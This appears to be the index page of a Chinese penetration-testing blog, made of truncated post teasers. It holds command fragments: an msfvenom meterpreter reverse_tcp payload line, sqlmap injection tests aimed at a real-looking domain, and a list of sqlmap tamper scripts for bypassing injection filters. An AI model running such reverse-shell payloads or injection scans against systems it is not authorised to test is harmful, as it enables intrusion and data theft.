msfvenom -l 列出所有模块，攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<...继续阅读 »

修改后台管理员登陆地址： 1、修改根目录下admin的名称 2、找到admin/globals.php中的代码 define('TEMPLATE_PA...继续阅读 »

sqlmap -u http://www.baidu.com/news_show.aspx?id=97 检测注入点是否可用 sqlmap -u http://www.baidu.com/news...继续阅读 »

每当注入的时候看到这个贱贱的提示框，内心有千万只草泥马在奔腾。   但很多时候还是得静下来分析过滤系统到底过滤了哪些参数，该如何绕过。 sqlmap中的tamper给我们带来了很多...继续阅读 »

本教程在腾讯云Ubuntu Server 16.04.1 LTS 64位上测试通过 登录到Ubuntu系统后，首先切换成root用户 sudo su 关...继续阅读 »

脚本如下 #coding=utf-8 import socket import time import re,os,sys,codecs type = 'utf-8' ...继续阅读 »

0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告： https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公...继续阅读 »

使用方法 --tamper xxx.py apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 ...继续阅读 »

Acunetix Web Vulnerability Scanner（简称AWVS）是一款知名的Web网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞。本文将讲解如何安装AWVS11，AWVS11全部是web端操作。 ...继续阅读 »